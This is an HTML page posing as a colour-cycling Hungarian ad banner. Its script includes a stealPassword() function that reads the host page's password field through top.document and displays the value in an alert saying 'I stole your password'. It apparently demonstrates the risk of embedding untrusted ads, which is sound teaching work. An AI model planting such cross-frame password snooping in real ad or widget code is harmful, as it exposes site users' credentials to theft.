<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title></title>

    <style>

        body {
            margin: 0;
            padding: 0;
        }

        #ad {
            width: 120px;
            height: 400px;
            border: 1px solid black;
            background: green;
            text-align: right;
            -moz-box-sizing: border-box;
            -webkit-box-sizing: border-box;
            box-sizing: border-box;
        }

        #ad > span {
            font-size: 10px;
            text-transform: uppercase;
            color: white;
            margin-right: 8px;
            font-family: 'Segoe UI';
        }

    </style>
</head>
<body>

    <div id="ad">
        <span>reklám</span>
    </div>

    <script>
        function reklam() {
            var colors = ["orange", "red", "green"];
            var ad = document.getElementById("ad");
            var index = 0;

            window.setInterval(function () {
                ad.style.backgroundColor = colors[index++];
                if (index >= colors.length) index = 0;
            }, 1000);
        }

        function stealPassword() {
            top.document.getElementById("password").onchange = function () {
                alert("ELLOPTAM A JELSZAVADAT: " + top.document.getElementById("password").value);
            }
        }

        reklam();
        stealPassword();
    </script>

</body>
</html>
